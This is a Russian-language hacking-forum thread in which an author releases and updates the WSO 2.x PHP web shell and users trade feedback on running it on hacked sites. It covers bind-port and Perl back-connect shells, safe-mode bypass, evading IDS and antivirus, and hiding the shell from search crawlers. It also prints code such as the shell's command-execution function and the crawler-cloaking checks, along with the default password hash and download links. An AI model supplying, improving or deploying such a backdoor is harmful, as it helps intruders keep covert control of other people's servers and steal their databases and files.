WSO2.4
Описание:

Авторизация
Информация о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Работа со строками + поиск хеша в онлайн базах
Биндпорт и бек-коннект (Perl)
Поиск текста в файлах
*nix/Windows
Из фишек
Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (24.32 KB)
Выбор кодировки, в которой работает шелл.


Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Скачать: http://narod.ru/disk/18331224000/wso2.4.zip.html
Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

Обновление:

Пофиксил баги
Мелкие исправления:
- clear теперь очищает консоль, не делая запрос на сервер
- При изменении кодировки, соединение с мускулом не "сбрасывается".
Добавлены
- Bind port to /bin/bash
- изменение даты модификации файла
Упаковал. Теперь вес (16 кб)

Первый пост обновил.

UPD:
еще несколько фиксов.
Спасибо: b3 (http://forum.antichat.ru/member.php?u=2674)

Обновление:

Уменьшен размер кода, генерируемого файловым менеджером
Добавлен новый сервис для расшифровки хеша
В файловом менеджере можно применять сортировки к столбцам
В SQL менеджере новый вывод таблиц (более наглядный, подсчет записей в каждой таблице)
Записи с длинным полями отображаются в компактном виде
Сделал возможность дампа бд. Можно выбирать конкретные таблицы.
В меню выделяется раздел, в котором находишься
Все формы в разделе Tools теперь нормальные (отправляются по enter'у)
Код местами переписан, + исправлены мелкие баги.


Отредактировал первый пост.

Отличная вещь. дизайн бы правда сменить :)

дизайн бы правда сменить :)
Скоро займусь 2й версией. По планам много будет изменено, дизайн в том числе.

Отличная вещь. дизайн бы правда сменить :)
главное не дизайн, а функционал.

п.с. зачётный шелл!

Небольшие фиксы:
- нормальная работа при safe-mode
- после соединения с mysql сервером, кодировка устанавливалась с помощью функции mysql_set_charset. Почитал мануал повнимательней: PHP 5 >= 5.2.3. Пофиксил.

Опаньки)Ща испробуем.Будет ещё обновляться что-нить ?):)

1)Или мне кажется,или r99 быстрее)
2) Я за смену дизайна:)(как у эрки) ).
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
4)Бэкконекта чет не вижу,а вот биндя есть:).


ЗЫ:Лови плюськи )

Обновляемый проект - хороший проект))).Буду(лично я - да) ждать с ультрамеганетерпением:)

Будет ещё обновляться что-нить ?)
Да, сейчас пишу вторую версию (переписываю с нуля). Будет заметно больше функционала, обновленный диз и нормальная кроссплатформенность.
1)Или мне кажется,или r99 быстрее)
не совсем понял, что ты имел в виду (c99 или r57). Все зависит от много, в том числе, какой именно функционал шелла используется. Но по скорости они не должны заметно отличаться.
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
по словарю будет, ssh - посмотрим.
4)Бэкконекта чет не вижу,а вот биндя есть
да, его там нет, сам его написать не мог, а чужой код вставлять не хотелось.

if (($perms & 0xC000) == 0xC000) $info = 's';
else if (($perms & 0xA000) == 0xA000) $info = 'l';
else if (($perms & 0x8000) == 0x8000) $info = '-';
else if (($perms & 0x6000) == 0x6000) $info = 'b';
else if (($perms & 0x4000) == 0x4000) $info = 'd';
else if (($perms & 0x2000) == 0x2000) $info = 'c';
else if (($perms & 0x1000) == 0x1000) $info = 'p';
else $info = 'u';Можно же сдвинуть вправо на 12 бит

Пасип,что ответил.Да,я имел ввиду r57:)(Видно,Веле не здоровилось сегодня:) )

Зачетный шел. Перешел с с99 madnet edition на этот. Из минусов - нету бекдора и дизайн мне больше нравился у c99 madnet. Автору респект

Если серв виндузяццкий, то ссылки у меня не совсем корректно работали. У себя на локалхосте тестил.

gromoza, дык в первом посте написано, что шелл только под *nix.
wso2 сейчас уже нормально работает на обоих платформах. Когда напишу весь функционал, который задумал - выложу релиз.

oRb респект! крутой шелл получился! ;) жду обновки!
Хочеться еще консольку под виндувс (а то команды не пашут на виндовсе под твоим шеллом)

Внутренняя ошибка сервиса.
Мы уже в курсе и стараемся исправить как можно быстрее. Возвращайтесь немного позже, все уже будет работать.

Перезалейте плиз куданить в другое место

Вот и 2я версия. Вся инфа в первом посте. Надеюсь все будут довольны :)

http://www.axifile.com/?3060315
http://depositfiles.com/files/2lvijsi1n
http://ifolder.ru/11818910
http://zalil.ru/27486709
качаем наздоровье

Дизайн никакой,тот был лучше

Респект! Вещь действительно хорошая.
Отмечю пару вещей которых на мой взгляд не хватает другим шеллам.

1) Авторизация по паролю, поскольку не используется метод Basic, шелл будет работать с паролем на гораздо большем количестве взломаных сайтов чем с Basic ибо она не поддерживается на каждом втором сайте (я про php basic а не htaccess).

2) Удобная работа с базой данных, именно этот шелл смог залезть в одну БД в которую другие по каким-то причинам не смогли получить доступ.
Но тут небольшая проблемма, - скачиваемый дамп не сжимается, жаль.

3) Очень красивый (опять таки на мой взгляд) дизайн, замечательное сочитание цветов, и не напрягает глаз.

А вот что из больших минусов, так это нет отображения листинга + как в с99 чтобы щёлкаешь по директории и попадаешь в неё. В этом направлении с99 удобнее.

ЗЫ: главное не запаковывай его как с99, а то опять будут проблеммы с запуском на многих хостах.

1) Авторизация по паролю, поскольку не используется метод Basic, шелл будет работать с паролем на гораздо большем количестве взломаных сайтов чем с Basic ибо она не поддерживается на каждом втором сайте (я про php basic а не htaccess).
Просто если php прикручен как cgi-обработчик, то Basic авторизация не пашет. Поэтому я и отказался от нее.
Но тут небольшая проблемма, - скачиваемый дамп не сжимается, жаль.Постараюсь реализовать в следующей версии
А вот что из больших минусов, так это нет отображения листинга + как в с99 чтобы щёлкаешь по директории и попадаешь в неё.Как нет? О_О Нажми на "Files" (2я ссыль в менюшке).
ЗЫ: главное не запаковывай его как с99, а то опять будут проблеммы с запуском на многих хостах.Ага, упакован он по обычному, надо будет придумать что-нибудь другое.

ps: по поводу диза. Цвет можно поменять самому. В начале скрипта есть переменная $color.

Шелл прикольненький....

А на cold fusion подобное кто-нить видел?

Отличный шелл...
Хотелось бы, чтобы ты добавил в SQL количество записей для каждой таблички...

Ня))) Орбик постаралсо.Всё ещё надеюсь на SSH и другие специфические вещички,которых нет у с99(опять ня).Подумаю,что можно ещё добавить:)

оО: А если флудер/спамер мыл туда присобачить,как в NFM ?)))(по списку и одному).Кому-то это покажется бесполезным,но по мне так наоборот - куча прог в одном скрипте,которые мона заюзать на хосте... Веля не параноик!)

А чо за Exception processing Message ? Далее идут адреса...

2Велемир
Может сразу туда добавить спамер однокласников и добавления видео с ютуба или получения прямых ссылок с файлообменика?

2Велемир
Может сразу туда добавить спамер однокласников и добавления видео с ютуба или получения прямых ссылок с файлообменика?

Я лишь высказал своё мнение.Твой ответ меня не интересует,а одноклассники - тем более

Предлагаю добавить следующее:

1.Показ IP/DNS сервера.Это нужно для того,чтобы по сотню раз не юзать команды.
2.Поставить эксплойты,как в NFS и GNY.
3. RFI/LFI FINDER.Видел такую реализацию и на производительности это никак не сказалось.
4.Сканер портов,дабы не бегать за сканерами.Реально напрягает.Всё это уже реализовано во многих шеллах.Лично я бы юзал их,если б не их минусы и дизайн.
5. PHP Safe-Mode Bypass.Читалка/писалки хорошо было бы видеть в последующих релизах.

Это всё.Спасибо за внимание.

Велемир,
1. IP итак показывается. DNS? А зачем? оО
2. вот поэтому они и весят по пол метра, а мой всего 20 килобайт.
3. Опять же лишний вес. И эта вещь мало кому нужна.
4. Возможно.
5. итак есть. Вот только вспомнить сплойтов под safe-mode для записи в файл, я что-то не могу.

ps: готовится версия 2.1

Escape character is '^]'.
Password:wso
/bin/sh: can't access tty; job control turned off
$ id
: not found
$
Почему не может получить доступ к tty? шелл биндится, но команды не работают.

shellz[21h], у меня нету достаточной информации, чтобы ответить на Ваш вопрос.
Могу задать лишь встречные вопросы:
1. как обстоят дела с биндпортами на других шеллах?
2. Что за система?
3. Если есть возможность скинуть линк на шелл в пм?

Server software: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch
OS version: Linux version 2.6.28-11-generic (buildd@palmer) (gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4) ) #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009
Distr name: Ubuntu 9.04

Userful: gcc cc ld make php perl python ruby tar gzip bzip2 nc locate
Downloaders: wget links lwp-mirror
Я тестирую на локалхосте, как выяснилось дело не в биндшелле который в вашем шелле, так как пробывал забиндить порт другим средствами, аналогичная проблема. На других хостах не тестил, но думается все работает.

Если биндить шелл, чтоб он запускал bash [ system('/bin/bash -i'); ] интерактивном режиме, то все работает.

Новая версия: 2.1
Обновил первый пост.
Кратко об изменениях:

Фиксы багов
В SQL-менеджере пишется число записей в таблице
SQL дамп и файлы качаются упакованными
Добавлена возможность постраничного просмотра содержимого таблиц
SQL-менеджер теперь работает и с PostgreSql
Добавлена возможность выбора как отправить запрос (AJAX или без него)
Улучшена работа шелла в инклюдах.
Небольшой конфиг в начале шелла


В планах на будущее: реализовать идею Digimortal'а об рандомных именах параметров и шифровании данных при передаче для обхода IDS

Не знаю как получаешь список файлов - на NetWare с safe_mode on не видет папок и файлов кроме себя хотя тот же r57 все замечательно видет,та даже вот так все выводится print_r(scandir("./")) а в твоем шелле почему то нет.

PaCo, спасибо за тест. Парочка встречных вопросов:
1. Если можешь, выложи ls -la той папки
2. Настройки пхп. Интересуют больше safe_mode_gid и disable_functions
3. а. Что вернет is_dir($dir), где $dir - папка, которую не отображает шелл.
3. б. Аналагочино с is_file()

PaCo, спасибо за тест. Парочка встречных вопросов:
1. Если можешь, выложи ls -la той папки
2. Настройки пхп. Интересуют больше safe_mode_gid и disable_functions
3. а. Что вернет is_dir($dir), где $dir - папка, которую не отображает шелл.
3. б. Аналагочино с is_file()
1)Не могу выложить ибо safe_mode, привилигии не повышал и честно не сталкивался с этим на NET WARE, вот что выводит r57:

u--------- 0 31.12.1969 19:00 some_file.php
u--------- 0 31.12.1969 19:00 some_file_2.php
14229335 -rwxrwxrwx 0 1011 01.06.2009 00:27 myfile_up.php
u--------- 0 31.12.1969 19:00 some_file_2.php
u--------- 0 31.12.1969 19:00 some_file_3.php
u--------- 0 31.12.1969 19:00 some_file_4.php
u--------- 0 31.12.1969 19:00 some_file_5.php
u--------- 0 31.12.1969 19:00 some_file_6.php
u--------- 0 31.12.1969 19:00 some_file_7.php
u--------- 0 31.12.1969 19:00 some_file_8.php
14890593 -rwxrwxrwx 0 171298 30.05.2009 20:12 my_shell_name.php
u--------- 0 31.12.1969 19:00 some_file_9.php

2) phpinfo() (http://slil.ru/27731035)
3) is_dir():
var_dump(is_dir("../")); // bool(false)
var_dump(is_dir("./")); // bool(false)
var_dump(is_dir("sys:/apache2/htdocs/site_name/admin_dir/main_dir")); // bool(false)

4)
is_file:
var_dump(is_file("sys:/apache2/htdocs/site_name/admin_dir/main_dir/some_file.php")); // bool(false) то есть старый файл не видет по все видимости, stat этого файла также выводит ошибку, хотя readfile() выводит содежимое этого файла, равно как и file_get_contents().

var_dump(is_file("sys:/apache2/htdocs/site_name/admin_dir/main_dir/my_shell_name.php")); // bool(true)
а новый файл определяеться, самое удивительное что все файлы доступны на запись и etc, по всей видимости это какие очень дикие настройки php(серверная API CGI кстати), шелл от madnet также ничего кроме себя не видет ибо наверника также опредляет файл по is_file(), только r57 тупа сканит дир и вылаживает содержимое без проверки на is_file() файлов поэтому они видны.

Вроде понял.
Бага похоже заключается в том, что scandir, не смотря на сейфмод возвращает все содержимое диры. А функции по типу is_dir, is_file, file_size и т.д. не могу получить инфу о файле из-за сейфмода. Т.е. ты с этими файлами ничего сделать не сможешь.
Возможно такой результат scandir - это бага сеймода той версии пхп (5.0.5).

Вроде понял.
Бага похоже заключается в том, что scandir, не смотря на сейфмод возвращает все содержимое диры.
Возможно такой результат scandir - это бага сеймода той версии пхп (5.0.5).
ну не только scandir возврашает содержимое дириктории, но и

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
echo "$file\n";
}
}
closedir($handle);
}

поэтому наврятли это трабла в нем,


А функции по типу is_dir, is_file, file_size и т.д. не могу получить инфу о файле из-за сейфмода. Т.е. ты с этими файлами ничего сделать не сможешь.

опровергая, в файлы я могу присвободно записывать(разуметься во все что в веб дире), имхо проблема скорее либо в серверной API либо в не совсем стандартном поведении функций is_dir, is_file, file_size на Net Ware в safe_mod, потому как все функции по сохранению в файл работают отлично.

3. Опять же лишний вес. И эта вещь мало кому нужна.


Ух...дело твоё,но вещь,на мой взгляд,очень полезна.Если учесть,что при залитии шелла можно спарсить названия всех скриптов...

oRb, на РНР 5.1.x Обход Safe Mode и open_basedir не пашет.(не знаю,есть ли у тебя обход base_dir),ибо они включены оба.Спасибо

Велемир, не существует универсального способа обхода safe mode'а для любых версий php. Если не пашет то, что заложено в шелле, и тебе реально нужен обход, тогда пробуй другие методы.

PaCo, я полистал сорцы php. Теперь понятно почему ты можешь писать в те файлы.
Файл: main/safe_mode.c
PHPAPI int php_checkuid(const char *filename, const char *fopen_mode, int mode)
{
#ifdef NETWARE
/* NetWare don't have uid*/
return 1;
#else
return php_checkuid_ex(filename, fopen_mode, mode, 0);
#endif
}Т.е. права на чтение, изменение файла задаются только chmod'ом. Но я не разобрался в поведении функций is_file, is_dir, is_link. Тупо не нашел их реализации, только прототипы функций.
Из-за отсутсвия uid в NetWare, мне вообще не понятно, как там работает safe mode =/

oRb,я заметил,что шелл не читает файлы иногда.Может,кто и писал уже,но проблема остаётся.Пишет - File not exists.Периодически вылетает.

Чот при редактировании файла после изменений и нажатия кнопки сохранить оказывается, что он не изменен, а страница с шеллом недогружена до конца

Новая версия: 2.2
Обновил первый пост.
Кратко об изменениях:

Фиксы багов
Добавлена возможность работы с zip архивами (упаковка, распаковка)*
Добавлена возможность поиска текста в файлах
Добавлена возможность читать файлы с помощью PostgreSql

* - требования для нормальной работы: http://ru.php.net/manual/ru/zip.requirements.php

WSOmanager
Написал небольшую тулзу для хранения и обработки шеллов. Работает только с WSO - шеллами версии >= 2.2.

Использует текстовую бд
Возможна работа через http-прокси
Вывод краткой информации о шелле
Выполнение php кода на шелле.


Конфиг находится в init.php. Для создания файла бд потребуется права на запись в каталог.

ps: Пробуем, юзаем. Если найдете баги, сообщите мне - обязательно исправлю.

А можешь выложить несжатый ?

Удобный шелл +1
SQL менеджер (MySql, PostgreSql) сюда еще и MSSQL добавить ваще класс было бы)

2 oRb,
выложи сорцы, если не сложно :)

2 oRb,
выложи сорцы, если не сложно :)
КОд похож на Base 64

Уже не надо, расшифровал =]

ЗЫ: там gzinflate + base64, всё элементарно.

“зҐв*лҐ § ЇЁбЁ Ї®«м§®ў ⥫Ґ© ¤«п
как бороться? :) справа сверху менюшка не помогает ) только если в браузере поменять кодировку на 866, юзаю FF 3.0.10

shdwcp, возможно в браузере стоит жесткая привязка кодировки к домену, и узказание кодировки в мета-тегах просто игнорится.

Небольшой апдейт.
Пофиксил пару багов и выложил архив, который включает в себя:

Сорцы ~64 кб
Упакованная gzip'ом версия ~24 кб
Сжатая версия ~60 кб
Менеджер шеллов


Ссылка на скачивание в первом посте.

Эх, Все бы ничего, только тему не читал. может уже обсуждалось, при поиске файлов на серве, или допустим запуска примитивного перловского бэк-конекта шелл подвисает, нужно убивать процесс:( Очень не удобно, можно было сэкономить время в другой вкладке что нибудь поделать, надеюсь понятно.
А так ничего шелл, удобно, все под рукой.

бэк-конекта шелл подвисает, нужно убивать процесс
Если убивать процесс, то как тогда будет работать бэк-коннект? нужно скрипт просто запускать в бэграунде.

']Если убивать процесс, то как тогда будет работать бэк-коннект? нужно скрипт просто запускать в бэграунде.
Ето только для примера, find в alias тоже запустить в бэграунд? Зачем лишний геморой, запустил скрипт бэк-конекта по возможности аплоадером залил, или подправил сорец шеллом, зачем еще лишний геморой...Я думаю если автор обратит на ето внимание, не нужно будет на такие мелочи обращать внимание, я щитаю ето недостатком, так как запарился при первой встрече с шеллом.

а как пароль поставить?

а как пароль поставить?

Раскомментируй строку: #$auth_pass = "63a9f0ea7bb98050796b649e85481845";

спасибо один раз он меня спас когда с99 почему то не мог "ходить по дирам"
Удобно было если добавили,рядом с выпадающим списком при копи пасте,имя файла которое в буфере и его отчистку(буфера).

Да... пришёл к выводу, что этот шелл по всем параметрам превзошёл великий c99.
Полностью перехожу на него. На мой взгляд равных нету.

Только пару существенных замечаний. Было бы неплохо если убрать из шелла HTML вставки, сделав чистый php код. Уже было пара случаев, когда при особых условиях на сервере шелл не пахал. Пришлось самому убирать вставки, конечно это ИМХО, но всё-же было бы неплохо, если бы их не было.

Ну и ещё сделать 404 для всех поисковиков, а не только для гугла, php код:
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Yandex') !== false){
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'YaDirectBot') !== false){
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'James Bond') !== false){
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false){
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Rambler') !== false){
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') !== false){
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'ia_archiver') !== false){
header("HTTP/1.0 404 Not Found");
die;
}

!!! плиз =)
Делал для себя, ещё осталось:
http://www.bashare.ru/download/wso3.rar
Правда код чуток кривой, ибо проверки на существование, или пустых POST запросов не делал, торопился.

У меня первый раз такое,залил шелл
в поле Change dir:
<?=htmlspecialchars($GLOBALS['cwd']);?>
так же вылетают теги около кнопок,под дирам он ходить не хочет,другим шеллом отредактировл его ,и все равно такая же фигня,может кто поможет.
НАшел там gny shell зилитый с полгода назад, по виду модификация с99,он каким то образом работает :confused:

У меня первый раз такое,залил шелл
в поле Change dir:
<?=htmlspecialchars($GLOBALS['cwd']);?>
так же вылетают теги около кнопок,под дирам он ходить не хочет,другим шеллом отредактировл его ,и все равно такая же фигня,может кто поможет.
НАшел там gny shell зилитый с полгода назад, по виду модификация с99,он каким то образом работает :confused:

там просто пхп не работает ))))))

Shadrin, у тебя просто старая версия шелла. Php на твоем хосте настроен с опцией short_open_tag = Off. Поэтому и не работало.
Обнови свой шелл. (ссылки в первом посте)

SQLHACK да нет работает,шелы то другие работают
oRb спасибо дело в шляпе) теперь все норм

Новая версия
убраны биндпорт и бек-коннект на C (лишний груз, перл в этом плане рулит)
при использовании биндпорта и бек-коннекта шелл больше не "зависает" (перловые скрипты отвязываются от терминала)
убрал html вставки
модифицировал антииндексатор. Теперь там не только гугл
Сделал, чтобы по дефолту кодировака была windows-1251
добавил возможность установить в конфиге (в начале скрипта) дефолтную кодировку
фиксы багов)


Обновил первый пост. Спасибо за тесты и новые идеи.

ps: jokester'у привет ;)

убраны биндпорт и бек-коннект на C (лишний груз, перл в этом плане рулит)

ты не прав. Если ты кроме пыха нихуя не знаешь, то это всё равно не позволяет тебе так говорить.

тем более, что не всегда на борту есть перл

ЗЫ из-за какогото шелла, взяли в МОА. ппц

Все бы хорошо, но не удобно пользоваться шеллом, именно команды писать!

к плюсам шелла еще можно добавить то, что он не детектируется антивирусами, как старые шеллы )

не лучше ли " R T E D"отодвинуть к выделению файлов?

http://i031.radikal.ru/0910/7e/8afb93661ab7.jpg
косит в фф немного(

убраны биндпорт и бек-коннект на C (лишний груз, перл в этом плане рулит)ты не прав. Если ты кроме пыха нихуя не знаешь, то это всё равно не позволяет тебе так говорить.Этот вопрос обсуждался в РОА и решение было вынесено коллективно.
Оказывается мы все не правы, чтож, будем знать.

убраны биндпорт и бек-коннект на C (лишний груз, перл в этом плане рулит)
Прекрасненько, да если надо биндпорт или бек-коннект, то я думаю труда несоставит залить скрипт так же как и шелл.

Шелл понравился :) Несколько замечаний.
При работе с БД не помешает сделать разделение колонок, читать неудобно, как заголовки, так и их значения.
При неудачном коннекте к бд выводить ошибку (тайм аут, неверные данные...)
В дампах постгрес в начале не пишется CREAT TABLE(), приходится дописывать самостоятельно :)
Так же насчёт дампов, неплохо сделать опцию для его сохранения, а не сразу - скачивание.
Думаю не будет в ущерб добавить ещё немного вариантов обхода сейф мода. И чтоб опция появлялась на глаза, лишь по необходимости, т.е. при сейфмоде, либо опенбейсдир.
Помнится обещался обход ids, стоит ждать или нет? Давно приделал такую феньку к c99 :)

добный шелл +1
SQL менеджер (MySql, PostgreSql) сюда бы еще и MSSQL добавить и ваще супер было бы)

Шелл лучший. Есть всё что надо!

Правда есть
Замечания:

1) Когда в разделе SQL выбираешь таблицу, например `users` из базы base1,
а потом выбираешь другую базу (base2), то в поле запроса остаётся старый запрос - "SELECT * FROM `users` LIMIT 0,30". И он выполняется для новой базы и если в ней нет такой таблицы - выдаётся ошибка "Error: Table 'base2.users' doesn't exist".

Может показаться, что это мелкий недочёт.
А вдруг в поле запроса будет написано TRUNCATE TABLE `users` или DROP TABLE `users` и в base2 таки окажется таблица users :), удаление которой не известно чем чревато.
Конечно редко когда пишут такие вещи в этом поле, но всё же!

2) Не плохо было бы добавить возможность просмотра картинок - если у файла расширение preg_match("/.jpg|.gif|.png|.bmp$/i"), то - в колонку "Actions" добавлять буковку v (view). И при нажатии на неё показывать картинку.
В своём скрипте я реализовал это так:
до всякого вывода на страницу поместил код:

if(isset($_GET['f']))
{
$f = $_GET['f'];
if (stristr($f, ".jpg") || stristr($f, ".png") || stristr($f, ".jpeg") || stristr($f, ".gif") || stristr($f, ".bmp"))
{
header('Content-Type: image/gif');
ob_clean();
flush();
readfile($f);
die();
}
}

- и джпг и пнг показывает!

Просто текстовый файл можно если что прочитать, а картинку - куй, приходится её копировать в веб-директорию и набирать адрес в браузере... ну или скачивать :). А тут - раз и готово :)

3) На серверах с ОС Windows неизвестно в какую папку можно писать, а в какую нет. То есть в некоторых директориях для всех папок права drwxrwxrwx и Owner/Group: 0/0, но в какую-то из них писать можно, а в какую-то нет. и узнать в какую именно можно только экспериментальным путём :( Но это уже из-за особенностей разделения прав пользователей в системах Windows . У папки просто другой владелец - по аналогии с папками в C:\Documents and Settings\%username% (пользователи не могут читать чужие документы).
Вот как средствами php различать папки, доступные на запись от недоступных - ХЗ! Если кто знает, напишите плиз в личку! Ну или здесь.

А в целом - шелл суперский, 100% лучше чем с99.
До того, как его нашёл пользовался своим недописанным, в итоге так и не дописал :)

Вот это дико напрягает:

При неудачном коннекте к бд выводить ошибку (тайм аут, неверные данные...)

И ещё было бы хорошо:
1. добавить возможность вводить порт для подключения к БД
2. при просмотре таблицы например где 7 миллионов записей, очень неудобно постраничное переключение)))
3. ajax по умолчанию включить

А, и когда очень большую таблицу смотришь - куча трафика и времени уходит на генерацию номеров страниц для просмотра таблицы по 30 записей - в результате - куча номеров от 1 до 4800 например. Лучше если десяток первых и последних и многоточие посередине.

(Dm),
1. добавить возможность вводить порт для подключения к БДШелл понимает конструкцию hostname:port.
2. при просмотре таблицы например где 7 миллионов записей, очень неудобно постраничное переключение)))Есть 1 идея - заюзать <select>. Хз пока что из этого выдет. Или вариант budden'a.
3. ajax по умолчанию включитьок


Выводы ошибок при соединении будут. Вернее они уже есть, но следующий релиз не раньше начала следующего года. Много надо сделать, а времени сейчас, к сожалению, совсем нет.

Есть 1 идея - заюзать <select>. Хз пока что из этого выдет. Или вариант

Сделай как phpmyadmin

Наилучший вариант - сделать как сказал budden + добавить input для ручного ввода номера страницы и input для номера записи, с которой начать просмотр (например в таблице 7 млн записей, а нам нужно посмотреть запись с id = 2.000.000. Чтобы не высчитывать номер страницы просто вводим в input id нужной записи и вывод происходит начиная с неё).

ммм а куда команды в console вбивать.

ммм а куда команды в console вбивать.

Аналогичный вопрос...

Под консолью есть поле для ввода.
Просто там оформление сделано, как будто это настоящая консоль.

Не чего туда ввести нельзя...

Не чего туда ввести нельзя...
а вот и неправда.

О, нет-нет :) пожалуйста не делайте аякс дефолтово включенным. Я хочу всегда точно знать - идет ли передача на сервер или нет. Или чтобы его можно было отключить прямо в начале файла (интересует пакованный), типа $ajax=0;

x']а вот и неправда.

Бля, да не получается =\
Стукните кто нибудь - 91-97-91

Справа в "консоли" есть скролл. Если присмотреться, то видно, что скролл не на всю высоту "консоли". Нижняя строчка - это и есть поле ввода.

Справа в "консоли" есть скролл. Если присмотреться, то видно, что скролл не на всю высоту "консоли". Нижняя строчка - это и есть поле ввода.
Спасибо пупсик, нашел :*

вот ещё, в консоле под unix системами не видно ошибок, постоянно добавляю 2>&1 в конец. можно как-то это исправить?

изминить малость функцию wsoEx и все готово, больше не придется добавлять в конце 2>&1 :)

<?php
//......

function wsoEx($in) {
$out = '';
$in .= ' 2>&1'; // - Добавляет в конец команды
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
?>

shellz[21h]
Гениально просто :)

Вопрос, в чем отличие wso2_pack2 от wso2_pack и от wso2?

wso2_pack - Упакован хитрым способом, чтоб антивирусами не полился.
wso2_pack2 - Не упакован, так сказать слегка обфусцирован, удалены \r\n, местами записан в строчку.
wso2 - Не упакован, код читабельный.

работает ли консоль под Windows?

А для чего WSO manager?

работает ли консоль под Windows?

нет

работает ли консоль под Windows?

работает. мог бы затестить на локалхосте.

:.']работает. мог бы затестить на локалхосте.
тестил на машине в локалке WINDOWS стоит, скрипт просто "зависал" и все

тестил на машине в локалке WINDOWS стоит, скрипт просто "зависал" и все
Шелл работает отлично, тестил на апаче.

Шелл работает отлично, тестил на апаче.
заработало, спасибо :)

Хотелось бы видеть вкладочку Proc. как в c99 )

еще не хватает функции редактирования sql баз(не через команд строку)

еще не хватает функции редактирования sql баз(не через команд строку)
вот не надо этой фигней разбавлять размер.
Требуется это не часто, и ради этог уж выучи синтаксис команд update и insert.

небольшой недочет:
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
foreach($userAgents as $agent)
if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) {

Дело в том что например бот msn, подписывается сейчас по крайней мере msnbot, т.е скрипт даст ему проиндексировать.

Для сравнения можно использовать, такую конструкцию:
$allBots = implode('|', $userAgents);
if (preg_match('/'.$allBots.'/i', $_SERVER['HTTP_USER_AGENT'])) {

небольшой недочет:
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
foreach($userAgents as $agent)
if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) {

Дело в том что например бот msn, подписывается сейчас по крайней мере msnbot, т.е скрипт даст ему проиндексировать.

Для сравнения можно использовать, такую конструкцию:
$allBots = implode('|', $userAgents);
if (preg_match('/'.$allBots.'/i', $_SERVER['HTTP_USER_AGENT'])) {
Можно не использовать регексп, stripos();

Можно не использовать регексп, stripos();
Можно ещё писать лежа и спать на потолке =)

а по stripos:

(PHP 5)
stripos — Find position of first occurrence of a case-insensitive string

в php4 нет такой функции

Зачотный шелл.

Есть небольшая досадная вещь, когда ты пытаешься залить файл через "Обзор", то заливается он всегда рядом с шеллом, а не в ту директорию в которой ты сейчас находишься, и в которую подразумевалось залить файл ;(

Есть небольшая досадная вещь, когда ты пытаешься залить файл через "Обзор", то заливается он всегда рядом с шеллом, а не в ту директорию в которой ты сейчас находишься, и в которую подразумевалось залить файл ;(
У меня всё нормально. У тя точно последняя версия стоит?

У меня всё нормально. У тя точно последняя версия стоит?
Угумс, скачал щас с первого поста, вроде бы всё норм, зато в нём появилась старая проблемма с виндой, когда выскакивают ошибки с доступом к различным виртуальным дискам и т.д...
Я точно помню, что в какой то версии wso2 этого явно не было.

Немножко глупый вопрос. А как можно закачать скажем штук 100 файлов сразу в нужную папку? По одному с ума можно сойти...

заархивируй файлы, залей, разархивируй ;)

Немножко глупый вопрос. А как можно закачать скажем штук 100 файлов сразу в нужную папку? По одному с ума можно сойти...

Архивируй в ZIP. Потом заливай и выполняй: unzip filename

Есть одна проблема - не работает с MyISAM почему-то :(

http://img29.imageshack.us/img29/3572/unbenannt1ey.png Хотя БД есть.

для чего вообще нужен список кодировок вверху справа?

ещё предложение, после того как сделан backconnect. удалять bc.pl из /tmp/

для чего вообще нужен список кодировок вверху справа?
Для разных кодировок =\
Если не встречал - вероятно встретишь еще.

Я что то не врюблюсь а какой пароль на шелл?

Я что то не врюблюсь а какой пароль на шелл?

Мдя уж =\
Пароль:root

Мдя уж =\
Пароль:root

да ладно не судите строго, первый раз вижу что такое шелл, доменов дахера, а ума пока еще нет, вот и спрашиваю, все лучше чем смотреть на страницу ввода пароля и гадать. спасибо за ответ.

Для разных кодировок =\
Если не встречал - вероятно встретишь еще.


Бред это. Свистелка ненужная. Я когда пользуюсь с99, если мне надо поменять кодировку жму в браузере вид-кодировка и выбираю нужную.

Бред это. Свистелка ненужная. Я когда пользуюсь с99, если мне надо поменять кодировку жму в браузере вид-кодировка и выбираю нужную.
ну значит и пользуйся c99. функционал полезный.

